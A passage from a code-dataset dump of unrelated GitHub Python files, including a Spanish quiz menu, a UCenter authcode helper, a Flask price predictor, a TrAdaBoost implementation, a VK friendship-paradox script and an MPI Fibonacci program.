1/2/3/4/5/6/7/8/9/10: \"))\n print(\"\\n\")\n\n\n\n if choice == 1:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.today(\" \")\n time.sleep(1)\n\n elif choice == 2:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.yesterday(\" \")\n time.sleep(1)\n\n elif choice == 3:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.week(\" \")\n time.sleep(1)\n\n elif choice == 4:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.month(\" \")\n time.sleep(1)\n\n elif choice == 5:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.year(\" \")\n time.sleep(1)\n \n elif choice == 6:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.Quiz(\" \")\n time.sleep(1)\n \n elif choice == 7:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.top_points(\" \")\n time.sleep(1)\n\n elif choice == 8:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.top_percent(\" \")\n time.sleep(1)\n \n elif choice == 9:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.top_questions(\" \")\n time.sleep(1)\n \n \n elif choice == 10:\n print(\"Shutting down...\\n\")\n time.sleep(1)\n print('Gracias!')\n time.sleep(1)\n break\n\n\n else:\n print(\"Not a valid input\") ","repo_name":"knedgen/Spanish_Learning_Repo","sub_path":"spantools.py","file_name":"spantools.py","file_ext":"py","file_size_in_byte":10142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25657560105","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\ndef solve():\n N, Q = map(int, rl().split())\n \n under = [-1] * N\n top = list(range(N))\n \n for _ in range(Q):\n f, t, x = map(lambda v: int(v) - 1, rl().split())\n top_f = top[f]\n top_t = top[t]\n top[f] = under[x]\n top[t] = top_f\n under[x] = top_t\n \n ans = [0] * N\n for idx, con in enumerate(top):\n if con == -1:\n continue\n c = con\n while c != -1:\n ans[c] = idx + 1\n c = under[c]\n print(*ans, sep='\\n')\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"other/past202005-open/K.py","file_name":"K.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25130395423","text":"# -*- coding=utf-8 -*-\n\nimport base64\nimport random\n\nfrom ucenter import *\n\nclass Configs(object):\n UC_KEY = ''\n UC_API = ''\n UC_CHARSET = 'utf-8'\n UC_IP = ''\n UC_APPID = ''\n UC_PPP = '20'\n\n UC_CLIENT_VERSION = '1.5.2'\n UC_CLIENT_RELEASE = '20101001'\n \ndef b64_encode(s):\n return base64.encodestring(s)\n \ndef b64_decode(s):\n try:\n return base64.decodestring(s)\n except:\n return b64_decode(s+\"=\")\n\ndef random_string(length):\n charArray = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n return ''.join([random.choice(charArray) for i in range(length)])\n\nclass Ucenter(object):\n ENCODE, DECODE = 0, 1\n\n @classmethod\n def authcode_encode(cls, string, key, expiry=0):\n return cls.authcode(string, key, cls.ENCODE, expiry)\n\n @classmethod\n def authcode_decode(cls, string, key, expiry=0):\n return cls.authcode(string, key, cls.DECODE, expiry)\n\n @classmethod\n def authcode(cls, string, key, operation, expiry=0):\n if not string:\n return ''\n \n ckey_length = 4\n key = md5(key or Configs.UC_KEY)\n keya = md5(key[:16])\n keyb = md5(key[16:])\n if ckey_length:\n if operation == cls.DECODE:\n keyc = string[:ckey_length]\n else:\n keyc = random_string(ckey_length)\n else:\n keyc = ''\n\n cryptkey = keya + md5(keya + keyc)\n 
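# What follows is RC4: key-schedule the S-box from cryptkey, then XOR the payload with the keystream; the same stream both encrypts and decrypts.\n        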
key_length = len(cryptkey)\n\n if operation == cls.DECODE:\n string = b64_decode(string[ckey_length:])\n else:\n if expiry:\n expiry += now()\n string = '%10d' % expiry + md5(string + keyb)[:16] + string\n string_length = len(string)\n\n result = ''\n rndkey = [ord(cryptkey[i % key_length]) for i in range(256)]\n box = range(256)\n j = 0\n for i in xrange(256):\n j = (j + box[i] + rndkey[i]) % 256\n box[i], box[j] = box[j], box[i]\n\n a, j = 0, 0\n for i in xrange(string_length):\n a = (a + 1) % 256\n j = (j + box[a]) % 256\n box[a], box[j] = box[j], box[a]\n result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))\n\n if operation == cls.DECODE:\n if (int(result[:10]) == 0 or int(result[:10]) - now() > 0) \\\n and result[10:26] == md5(result[26:] + keyb)[:16]:\n return result[26:]\n else:\n return ''\n else:\n return keyc + b64_encode(result).replace('=', '')\n","repo_name":"ghoulr/ucenter","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"19404655103","text":"from flask import Flask\r\nfrom flask import Flask, request, render_template\r\nimport pickle\r\nimport numpy as np\r\n\r\n\r\napp = Flask(__name__,template_folder='template')\r\ndef prediction(lst):\r\n filename = 'model/prediction_model_1.pickle'\r\n with open(filename,'rb') as file:\r\n model = pickle.load(file)\r\n pred_value = model.predict([lst])\r\n return pred_value\r\n\r\n\r\n\r\n@app.route('/',methods=['POST','GET'])\r\ndef index():\r\n pred = 0\r\n if request.method == 'POST':\r\n ram_gb = request.form['ram']\r\n brand = request.form['Brand']\r\n storage_gb= request.form['Storage']\r\n screen_size_inch = request.form['Screen Size']\r\n main_camera_mp = request.form['main_camera(MP)']\r\n camera_count = request.form['rear cameras count']\r\n battery_capacity_mah = request.form['Battery Capacity']\r\n\r\n feature_list =[]\r\n feature_list.append(int(ram_gb))\r\n feature_list.append(float(screen_size_inch))\r\n feature_list.append(int(storage_gb))\r\n feature_list.append(int(main_camera_mp))\r\n feature_list.append(int(camera_count))\r\n feature_list.append(int(battery_capacity_mah))\r\n\r\n brand_list = ['Samsung','Xiaomi','Oppo','Realme','Vivo','Apple','Nokia','Motorola','OnePlus','Huawei','Google','other']\r\n def traverse_list(lst, value):\r\n for item in lst:\r\n if item == value:\r\n feature_list.append(1)\r\n else:\r\n feature_list.append(0)\r\n\r\n traverse_list(brand_list, brand)\r\n\r\n pred = prediction(feature_list)\r\n pred = pred*-1\r\n pred = np.round(pred[0])\r\n print(pred)\r\n\r\n \r\n \r\n return render_template('index.html',pred = pred)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"MKDpahasara/Smartphone-Price-Prediction-Model-Using-Machine-Learning","sub_path":"Web App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34259200882","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('visualizations', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='query',\n name='visualization',\n ),\n migrations.AddField(\n model_name='visualization',\n name='query',\n field=models.OneToOneField(to='visualizations.Query', null=True),\n ),\n 
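# Net effect of this migration: the relation moves from Query onto Visualization as a nullable OneToOneField, flipping which model owns the link.\n    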
]\n","repo_name":"aeud/sing","sub_path":"apps/visualizations/migrations/0002_auto_20151109_0521.py","file_name":"0002_auto_20151109_0521.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12458289562","text":"import re\nfrom enum import Enum\nfrom copy import deepcopy\nfrom pprint import pprint\nfrom functools import reduce, cmp_to_key\nfrom itertools import groupby, combinations, permutations\nfrom time import time\nfrom queue import PriorityQueue\nfrom math import prod, ceil, comb, perm\nfrom collections import defaultdict, Counter\nfrom dataclasses import dataclass\nfrom bisect import insort\nfrom operator import add, mul\nfrom functools import lru_cache\nimport numpy as np\nimport string\nimport sys\nfrom sys import exit\nfrom scipy.ndimage import generic_filter\n\nfile = sys.argv[1] if len(sys.argv) > 1 else \"ex1\"\nlines = list(map(lambda l: l.rstrip(), open(file + \".txt\").readlines()))\n\n# ----------------------------------------------------------------------\n# * Parsing(/setup)\n\nNB_EVEN = {\"w\": (0, -2),\n \"nw\": (1, -1),\n \"ne\": (1, 1),\n \"e\": (0, 2),\n \"se\": (0, 1),\n \"sw\": (0, -1)}\n\nNB_ODD = {\"w\": (0, -2),\n \"nw\": (0, -1),\n \"ne\": (0, 1),\n \"e\": (0, 2),\n \"se\": (-1, 1),\n \"sw\": (-1, -1)}\n\n# ----------------------------------------------------------------------\n# * Part 1\n\nflipped = defaultdict(lambda: False)\nminp = np.array([1000000, 1000000], dtype=int)\nmaxp = np.array([-1000000, -1000000], dtype=int)\n\nfor line in lines:\n pos = np.array([0, 0], dtype=int)\n\n pat = r\"(nw)|(ne)|(sw)|(se)|(w)|(e)\"\n for d in re.finditer(pat, line):\n if pos[1] % 2 == 0:\n pos += np.array(NB_EVEN[d.group()])\n else:\n pos += np.array(NB_ODD[d.group()])\n\n flipped[(pos[0], pos[1])] ^= True\n\n minp[0] = min(minp[0], pos[0])\n minp[1] = min(minp[1], pos[1])\n maxp[0] = max(maxp[0], pos[0])\n maxp[1] = max(maxp[1], pos[1])\n\nprint(\"Part 1: {}\".format(len([f for _, f in flipped.items() if f == True])))\n\n# ----------------------------------------------------------------------\n# * Part 2\n\ndef debug(floor):\n for row in floor:\n print(\" \".join([\"1\" if b else \"0\" for b in row]))\n\ndef flip(floor, days):\n for _ in range(days):\n floor = np.pad(floor, 4, constant_values=False)\n (m, n) = floor.shape\n flipped = floor.copy()\n for i in range(2, n-2):\n for j in range(2, m-2):\n dirs = NB_EVEN.values() if j % 2 == 0 else NB_ODD.values()\n\n adj = np.sum([floor[j + y][i + x] for x, y in dirs])\n\n if floor[j][i] == True:\n if adj == 0 or adj > 2:\n flipped[j][i] = False\n else:\n if adj == 2:\n flipped[j][i] = True\n floor = flipped\n debug(floor)\n\n return floor\n\n\nsize = np.array(maxp - minp + 1, dtype=int)\nfloor = np.zeros((size[1], size[0]), dtype=bool)\nfor x, y in flipped.keys():\n floor[y - minp[1]][x - minp[0]] = True\n\n\nif minp[1] % 2 == 1:\n floor = np.pad(floor, 1, constant_values=False)\n \npprint(flipped)\ndebug(floor)\n\nprint(\"Part 2: {}\", np.sum(flip(floor, 2)))\n","repo_name":"U32Float/AoC","sub_path":"2020/day24/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5654911097","text":"from kivymd.uix.screen import MDScreen\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivymd.uix.boxlayout import MDBoxLayout\nfrom kivymd.uix.textfield import MDTextField\nfrom kivymd.uix.button import 
MDTextButton\nfrom kivy.properties import Clock\n\n\n\nclass UserSetting(MDScreen):\n \n def update_email(self):\n icon_btn,email_obj = self.ids.email_container.children\n self.text_field = MDTextField(size_hint_x=0.5,text=self.ids.email.text)\n self.btn = MDTextButton(text=\"Update\",pos_hint={\"top\":0.5})\n self.ids.email_container.remove_widget(email_obj)\n self.ids.email_container.remove_widget(icon_btn)\n self.ids.email_container.add_widget(self.text_field)\n self.ids.email_container.add_widget(self.btn)\n self.ids.email_container.spacing = 20\n Clock.schedule_once(self.set_focus)\n \n def update_name(self):\n icon_btn,name_obj = self.ids.name_container.children\n self.text_field = MDTextField(text=self.ids.name.text)\n self.btn = MDTextButton(text=\"Update\",pos_hint={\"top\":0.5})\n self.ids.name_container.remove_widget(name_obj)\n self.ids.name_container.remove_widget(icon_btn)\n self.ids.name_container.add_widget(self.text_field,index=0)\n self.ids.name_container.add_widget(self.btn)\n self.ids.name_container.spacing = 20\n Clock.schedule_once(self.set_focus)\n\n def set_focus(self,*args):\n self.text_field.focus = True","repo_name":"marvelous-benji/kivy-client-server","sub_path":"Settings/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71189254546","text":"import math\nimport pickle\nimport pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom string import punctuation\n\n\ndef get_terms(email):\n \"\"\"1) Lowercase the email\n 2) Tokenize the email into words\n 3) Remove stop words and punctuation\n \"\"\"\n tokens = word_tokenize(email.lower())\n words_to_remove = stopwords.words(\"english\")\n words_to_remove.extend(list(punctuation))\n return [t for t in set(tokens) if not t in words_to_remove]\n\n\ndef get_term_doc(emails):\n \"\"\"Turn tokenized emails into a term-document dictionary\"\"\"\n term_doc = {}\n for i, email in enumerate(emails):\n for term in email:\n if term in term_doc:\n term_doc[term].add(i)\n else:\n term_doc[term] = {i}\n return term_doc\n\n\ndef compute_idfs(term_doc, corpus_size):\n \"\"\"\n Calculate idfs for all the terms\n idf = log2 (corpus size / doc freq)\n \"\"\"\n idfs = {}\n for term in term_doc:\n doc_freq = len(term_doc[term])\n idfs[term] = math.log2(corpus_size / doc_freq)\n return idfs\n\n\nif __name__ == \"__main__\":\n # reading in the E-mails from the Hillary Clinton email corpus\n emails = (pd.read_csv(\"Emails.csv\")\n [\"ExtractedBodyText\"]\n .dropna()\n .tolist())\n tokenized_emails = [get_terms(email) for email in emails]\n term_doc = get_term_doc(tokenized_emails)\n idfs = compute_idfs(term_doc, len(emails))\n\n # we will use this pickle in the get_tfidfs.py script\n with open(\"idf_results.p\", \"wb\") as idf_file:\n pickle.dump(idfs, idf_file)\n","repo_name":"etsuprun/text_mining_with_tfidf","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71389419666","text":"import sys\n\n\nname = __file__.split('\\\\')[-1][:-3]\nfile = open(f'{name}.txt', 'r')\nsys.stdin = file\ntest_case = int(input())\n\ndef search(bitt, idx, val):\n # if num == 3:\n # print(bin(bitt), idx, val)\n if val >= B:\n global minn\n minn = min(minn, val)\n return\n if not bitt:\n return \n search(bitt - (1 << idx) , idx + 1, 
val)\n if val + lst[idx] < minn:\n search(bitt - (1 << idx), idx + 1, val + lst[idx])\n\n \n\n\nfor num in range(test_case):\n return_value = 0\n N, B = map(int, input().split())\n lst = list(map(int, input().split()))\n minn = float('inf')\n search( (1 << N) - 1, 0, 0)\n\n print(f'#{num + 1} {minn - B}')\n # break","repo_name":"sangbumlikeagod/SSAFY","sub_path":"0922/heightchair.py","file_name":"heightchair.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1410787743","text":"import numpy as np\nfrom scipy.special import softmax\nfrom sklearn.tree import DecisionTreeClassifier\nimport lightgbm as lgb\nfrom sklearn.metrics import roc_auc_score\n\n\nclass TrAdaBoost:\n \"\"\"\n Implement TrAdaBoost\n To read more about the TrAdaBoost, check the following paper:\n Dai, Wenyuan, et al. \"Boosting for transfer learning.\" Proceedings of the 24th international conference on\n Machine learning. ACM, 2007.\n\n ps: Different from other implementations, use predict_proba instead of predict\n \"\"\"\n\n def __init__(self, learner, num_iterations):\n self.learner = learner\n self.num_iterations = num_iterations\n self.beta_t = None\n self.models = []\n\n def fit(self, x_target, x_source, y_target, y_source):\n row_source = x_source.shape[0]\n row_target = x_target.shape[0]\n\n x_trans = np.concatenate((x_source, x_target), axis=0)\n y_trans = np.concatenate((y_source, y_target), axis=0)\n\n x_trans = np.asarray(x_trans)\n y_trans = np.asarray(y_trans)\n\n beta = 1 / (1 + np.sqrt(2 * np.log(row_source / self.num_iterations)))\n self.beta_t = np.zeros([self.num_iterations, 1])\n\n # 初始化权重\n weight_source = np.ones([row_source, 1]) / row_source\n weight_target = np.ones([row_target, 1]) / row_target\n weights = np.concatenate((weight_source, weight_target), axis=0)\n\n for i in range(self.num_iterations):\n sample_weights = self._calculate_weight(weights)\n self.learner.fit(x_trans, y_trans, sample_weights[:, 0])\n self.models.append(self.learner)\n result = self.learner.predict_proba(x_trans)[:, 1]\n error_rate = self._calculate_error_rate(y_target, result[row_source:row_source + row_target],\n weights[row_source:row_source + row_target])\n\n if error_rate > 0.5:\n error_rate = 0.5\n if error_rate == 0:\n self.num_iterations = i\n break # 防止过拟合\n\n self.beta_t[i] = error_rate / (1 - error_rate)\n\n # 调整源域样本权重\n for j in range(row_source):\n weights[j] = weights[j] * np.power(beta, (np.abs(result[j] - y_source[j])))\n\n # 调整目标域样本权重\n for j in range(row_target):\n weights[row_source + j] = weights[row_source + j] * np.power(self.beta_t[i],\n (-np.abs(\n result[row_source + j] - y_target[j])))\n\n @staticmethod\n def _calculate_weight(weights):\n sum_weight = np.sum(weights)\n return np.asarray(weights / sum_weight)\n\n @staticmethod\n def _calculate_error_rate(y_target, y_predict, weight):\n total = np.sum(weight)\n return np.sum(weight[:, 0] / total * np.abs(y_target - y_predict))\n\n def predict(self, x_test):\n row_test = x_test.shape[0]\n result = np.ones([row_test, self.num_iterations])\n predict = np.ones([row_test, 1])\n for i in range(self.num_iterations):\n result[:, i] = self.models[i].predict_proba(x_test)[:, 1]\n for i in range(row_test):\n left = np.sum(result[i, int(np.ceil(self.num_iterations / 2)):self.num_iterations] * np.log(\n 1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n right = 0.5 * np.sum(\n np.log(1 / self.beta_t[int(np.ceil(self.num_iterations 
/ 2)):self.num_iterations]))\n if left >= right:\n predict[i] = 1\n else:\n predict[i] = 0\n return predict\n\n def predict_proba(self, x_test):\n \"\"\"\n 与其他实现不同的是加了softmax函数\n \"\"\"\n row_test = x_test.shape[0]\n result = np.ones([row_test, self.num_iterations])\n predict = np.ones([row_test, 2])\n for i in range(self.num_iterations):\n result[:, i] = self.models[i].predict_proba(x_test)[:, 1]\n for i in range(row_test):\n left = np.sum(result[i, int(np.ceil(self.num_iterations / 2)):self.num_iterations] * np.log(\n 1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n right = 0.5 * np.sum(\n np.log(1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n predict[i] = softmax([right, left])\n return predict\n\n\nif __name__ == '__main__':\n # Generate data\n np.random.seed(0)\n # Generate training source data\n ns = 200\n ns_perclass = ns // 2\n mean_1 = (1, 1)\n var_1 = np.diag([1, 1])\n mean_2 = (3, 3)\n var_2 = np.diag([2, 2])\n Xs = np.r_[np.random.multivariate_normal(mean_1, var_1, size=ns_perclass),\n np.random.multivariate_normal(mean_2, var_2, size=ns_perclass)]\n ys = np.zeros(ns)\n ys[ns_perclass:] = 1\n # Generate training target data\n nt = 50\n # imbalanced\n nt_0 = nt // 10\n mean_1 = (6, 3)\n var_1 = np.diag([4, 1])\n mean_2 = (5, 5)\n var_2 = np.diag([1, 3])\n Xt = np.r_[np.random.multivariate_normal(mean_1, var_1, size=nt_0),\n np.random.multivariate_normal(mean_2, var_2, size=nt - nt_0)]\n yt = np.zeros(nt)\n yt[nt_0:] = 1\n # Generate testing target data\n nt_test = 1000\n nt_test_perclass = nt_test // 2\n Xt_test = np.r_[np.random.multivariate_normal(mean_1, var_1, size=nt_test_perclass),\n np.random.multivariate_normal(mean_2, var_2, size=nt_test_perclass)]\n yt_test = np.zeros(nt_test)\n yt_test[nt_test_perclass:] = 1\n\n # transfer learning\n lightgbm_learner = lgb.LGBMClassifier(max_depth=3, n_estimators=100)\n trc = TrAdaBoost(learner=lightgbm_learner, num_iterations=5)\n trc.fit(Xt, Xs, yt, ys)\n print('lightgbm learner')\n print('train target auc: ', roc_auc_score(y_true=yt, y_score=trc.predict_proba(Xt)[:, 1]))\n print('test auc: ', roc_auc_score(y_true=yt_test, y_score=trc.predict_proba(Xt_test)[:, 1]))\n\n decision_tree_learner = DecisionTreeClassifier(max_depth=3)\n trc = TrAdaBoost(learner=decision_tree_learner, num_iterations=5)\n trc.fit(Xt, Xs, yt, ys)\n print('decision_tree learner')\n print('train target auc: ', roc_auc_score(y_true=yt, y_score=trc.predict_proba(Xt)[:, 1]))\n print('test auc: ', roc_auc_score(y_true=yt_test, y_score=trc.predict_proba(Xt_test)[:, 1]))\n","repo_name":"wuboyu88/transfer_learning","sub_path":"tradaboost.py","file_name":"tradaboost.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73570141906","text":"#!/usr/bin/python3\nimport init\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nl=logging.getLogger(__name__)\nclass Person:\n def __init__(self, user_id, friends_recursion=0,no_update_self=False):\n self.id=user_id\n self.first_name=...\n self.last_name=...\n self.screen_name=...\n self.friends=...\n if not no_update_self:\n self.update_self()\n if friends_recursion>0:\n self.update_friends(friends_recursion)\n def update_self(self):\n l.debug('Hitting VK for info on user id_{}...'.format(self.id))\n try:\n obj = init.api.users.get(user_ids=self.id,fields='screen_name')[0]\n self.first_name=obj['first_name']\n self.last_name=obj['last_name']\n 
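# screen_name is not in the default users.get payload, hence fields='screen_name' in the request above.\n            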
self.screen_name=obj['screen_name']\n except init.vk_api.VkApiError:\n l.exception('Failed to get info for user id_{}!'.format(self.id))\n def update_friends(self, depth=0):\n l.info('Updating friends with depth {}!'.format(depth))\n l.debug('Looking at friends of user id_{}...'.format(self.id))\n try:\n for i in init.api.friends.get(user_id=self.id,fields='screen_name')['items']:\n p=Person(i['id'],depth-1,True)\n if self.friends is ...:\n self.friends=[]\n if 'deactivated' not in i:\n p.first_name=i['first_name']\n p.last_name=i['last_name']\n p.screen_name=i['screen_name']\n self.friends.append(p)\n except init.vk_api.VkApiError:\n l.exception('Getting friends failed!')\n def print_recursive(self,started_from,limit_depth=None,current_depth=0):\n if current_depth==limit_depth:\n print(f'{\" \"*current_depth}{self.first_name} {self.last_name} (@{self.screen_name}, id_{self.id}).')\n return 0\n print(f'{\" \"*current_depth}{self.first_name} {self.last_name} (@{self.screen_name}, id_{self.id})' + (f' has {len(self.friends) if isinstance(self.friends, list) else \"an unknown number of\"} friend{\"\" if isinstance(self.friends, list) and len(self.friends)==1 else \"s\"}{\":\" if isinstance(self.friends, list) and len(self.friends)>0 else \".\"}' if self.friends is not ... else '.'))\n if isinstance(self.friends, list) and len(self.friends)>0:\n for i in self.friends:\n i.print_recursive(started_from,limit_depth if self.id not in started_from else current_depth+1, current_depth+1)\n\n def test_paradox(self):\n l.info(f'{self.first_name} {self.last_name} (@{self.screen_name}, id_{self.id}) has {len(self.friends)} friend{\"\" if len(self.friends)==1 else \"s\"}.')\n s=0\n c=0\n for i in self.friends:\n if i.friends is not ...:\n s+=len(i.friends)\n c+=1\n l.info(f'Of those, the friend counts could be acquired for {c} friends.')\n l.info(f'In total, those friends have {s} friends including the origin.')\n avg=s/c\n l.info(f'This results in {avg} friends per friend, which is {\"more\" if avg>len(self.friends) else \"less\"} than the origin\\'s friend count.')\n l.warn(f'The paradox {\"checks out\" if avg>len(self.friends) else \"does not check out\"}.')\n\nif __name__=='__main__':\n me = Person(input('Your ID:'),2)\n s=[]\n me.print_recursive(s)\n me.test_paradox()\n \n","repo_name":"danya02/slon-winter-2019-intro","sub_path":"friendship-paradox/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30931576732","text":"from time import sleep\nvalor1 = int(input('Digite o 1° valor: '))\nvalor2 = int(input('Digite o 2° valor: '))\nopção = 0\nwhile opção != 5:\n print(\"\"\"************************\n[1] Somar\n[2] Multiplicar\n[3] Maior\n[4] Novos números\n[5] Sair do programa\n************************\"\"\")\n opção = str(input('>>>> Informe a opção desejada: ')).strip()\n if opção in '12345':\n opção = int(opção)\n if opção == 1:\n soma = valor1 + valor2\n print(' {} + {} = {}'.format(valor1, valor2, soma))\n if opção == 2:\n mult = valor1 * valor2\n print('{} x {} = {}'.format(valor1, valor2, mult))\n if opção == 3:\n if valor2 != valor1:\n maior = max((valor1, valor2))\n print('O maior valor entre {} e {} é {}'.format(valor1, valor2, maior))\n else:\n print('Os valores são iguais!')\n if opção == 4:\n valor1 = int(input('Digite o 1° valor: '))\n valor2 = int(input('Digite o 2° valor: '))\n if opção == 5:\n print('Aguarde enquanto finalizamos o programa')\n 
print('Finalizando...')\n else:\n print('Opção inválida. Tente novamente')\nsleep(3)\nprint('Obrigado por usar o nosso programa. Volte sempre!')","repo_name":"dlimatiago/python-cev","sub_path":"curso-aula_em_video/Ex 059 - Criando um menu de opções.py","file_name":"Ex 059 - Criando um menu de opções.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73536301587","text":"from typing import Union\n\n\nfrom typing import Union\n\n\n\nclass Archive:\n\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super().__new__(cls)\n cls._instance.archive_text = []\n cls._instance.archive_number = []\n else:\n cls._instance.archive_text.append(cls._instance.text)\n cls._instance.archive_number.append(cls._instance.number)\n return cls._instance\n\n def __init__(self, text: str, number: Union[int, float]):\n if not isinstance(text, str) or not text:\n raise InvalidTextError(text)\n if not isinstance(number, (int, float)) or number <= 0:\n raise InvalidNumberError(number)\n self.text = text\n self.number = number\n\n def __str__(self):\n return f'Text is {self.text} and number is {self.number}. Also {self.archive_text} and {self.archive_number}'\n\n def __repr__(self):\n return f'Archive(\"{self.text}\", {self.number})'\n\nclass InvalidTextError(Exception):\n def __init__(self, text):\n self.text = text\n super().__init__(f\"Invalid text: {self.text}. Text should be a non-empty string.\")\n\n\nclass InvalidNumberError(Exception):\n def __init__(self, number):\n self.number = number\n super().__init__(f\"Invalid number: {self.number}. Number should be a positive integer or float.\")\n\n# help(Archive)\narchive = Archive(\"дом\", 5)\narchive_2 = Archive(6, 7)\nprint(archive)\n\nprint(repr(archive_2))\n# print(archive.archive_text)\n# print(archive_2.archive_numbers)","repo_name":"ValeryBurlakov/python_based","sub_path":"homeworks/homework_13/test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13553245984","text":"\"\"\"\nfibompibatch.py\n\nDescription: This computes the fibonacci sequence for multiple inputs\n\t using a parallel process (4 cores at a time)\n\t \n\t Basic fibonacci sequence calculation\n\t\tbase case: \t\t\n\t\tf(1) = 1\t\n\t\tf(2) = 1\n\t\trecursion: \n\t\tf(n) = f(n-1) + f(n-2) , n > 2 \n\nUsage: \t mpirun -n 4 python3 fibompibatch.py \n\n\"\"\"\n\nimport sys\nimport time\nimport fibomod as fb\nfrom mpi4py import MPI\nimport numpy as np\n\nnum_args = len(sys.argv)\nargs = sys.argv\nnum_cpu = 4\n\ndef check_valid(inlist):\n\tis_valid = 1\n\tfor i in range(1,len(inlist)):\n\t\tif(int(inlist[i])<1):\n\t\t\tis_valid = 0\n\treturn is_valid\n\n# Make sure there were 2 arguments to the program\nif(num_args == 2):\n\n\tis_valid = check_valid(args) \n\t# For all the inputs, sequentially compute the requested Fibonacci number\n\tif(is_valid):\n\n\t\tcomm = MPI.COMM_WORLD\n\t\tsize = comm.Get_size()\n\t\trank = comm.Get_rank()\n\n\t\tnumDataPerRank = 1\n\t\tdata = None\n\n\t\tfibo_list = np.arange(int(args[1])) + 1\n\t\tnum_batches = int(len(fibo_list)/num_cpu)\n\n\t\tif rank==0:\t\t\n\t\t\tprint(\"...valid inputs...\")\n\t\t\tprint(\"...number of batches: \" + str(num_batches))\n\n\t\tfor i in range(num_batches):\n\n\t\t\tif rank==0:\n\t\t\t\tt0 = time.time()\n\t\t\t\tdata = 
np.array(fibo_list[(i*num_cpu):((i+1)*num_cpu)],dtype='d')\n\t\t\t\tprint(\"...batch: \", i + 1);\n\n\t\t\trecvbuf_nodes = np.empty(numDataPerRank,dtype='d')\n\t\t\tcomm.Scatter(data,recvbuf_nodes, root=0)\n\t\t\trecvbuf_nodes = np.array(float(fb.calc_fibo(int(recvbuf_nodes)))) # for each input, compute the output\n\n\t\t\trecvbuf_root = np.empty(4,dtype='d')\n\t\t\tcomm.Gather(recvbuf_nodes,recvbuf_root, root=0) \t\n\n\t\t\tif rank==0:\n\t\t\t\tfor i in range(4):\n\t\t\t\t\toutStr = \"The \" + str(int(data[i])) + \"-th Fibonacci number is: \" + str(int(recvbuf_root[i]))\n\t\t\t\t\tprint(outStr)\n\t\t\n\t\t\t\tt1 = time.time()\n\t\t\t\twt = t1-t0 \n\t\t\t\ttimeStr = \"Wall time = \" + str(\"{:.4}\".format(wt)) + \" seconds\"\n\t\t\t\tprint(timeStr)\n\t\t\t\t\n\t\n\telse:\n\t\tprint(\"...ERROR! Usage: fibompibatch , integer > 0\")\t\nelse:\n\tprint(\"...ERROR! Usage: fibompibatch , integer > 0\")\n\n\t\n\n","repo_name":"cdimattina/MPI_Python","sub_path":"FIBNUM/fibompibatch.py","file_name":"fibompibatch.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14900532636","text":"def hangman(word):\r\n wrong = 0\r\n stages = [\"\",\r\n \"________ \",\r\n \"| | \",\r\n \"| | \",\r\n \"| 0 